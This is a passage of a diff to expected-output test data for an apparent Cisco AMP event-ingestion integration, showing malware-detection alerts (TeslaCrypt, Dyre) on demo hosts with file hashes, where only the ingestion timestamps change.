"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1458,7 +1458,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337136400Z", + "ingested": "2021-12-14T14:40:41.774814763Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -1542,7 +1542,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337142200Z", + "ingested": "2021-12-14T14:40:41.774849335Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1626,7 +1626,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337148100Z", + "ingested": "2021-12-14T14:40:41.774849864Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1710,7 +1710,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337153900Z", + "ingested": "2021-12-14T14:40:41.774850274Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1809,7 +1809,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337159700Z", + "ingested": "2021-12-14T14:40:41.774850756Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1897,7 +1897,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337165500Z", + "ingested": "2021-12-14T14:40:41.774851223Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1996,7 +1996,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337170800Z", + "ingested": "2021-12-14T14:40:41.774851861Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2084,7 +2084,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337174700Z", + "ingested": "2021-12-14T14:40:41.774852290Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -2183,7 +2183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337179600Z", + "ingested": "2021-12-14T14:40:41.774852705Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2267,7 +2267,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337185500Z", + "ingested": "2021-12-14T14:40:41.774853126Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -2366,7 +2366,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337190500Z", + "ingested": "2021-12-14T14:40:41.774853541Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2450,7 +2450,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337194500Z", + "ingested": "2021-12-14T14:40:41.774853966Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -2530,7 +2530,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337199200Z", + "ingested": "2021-12-14T14:40:41.774858073Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -2620,7 +2620,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337205100Z", + "ingested": "2021-12-14T14:40:41.774858502Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2706,7 +2706,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337210900Z", + "ingested": "2021-12-14T14:40:41.774858925Z", "original": 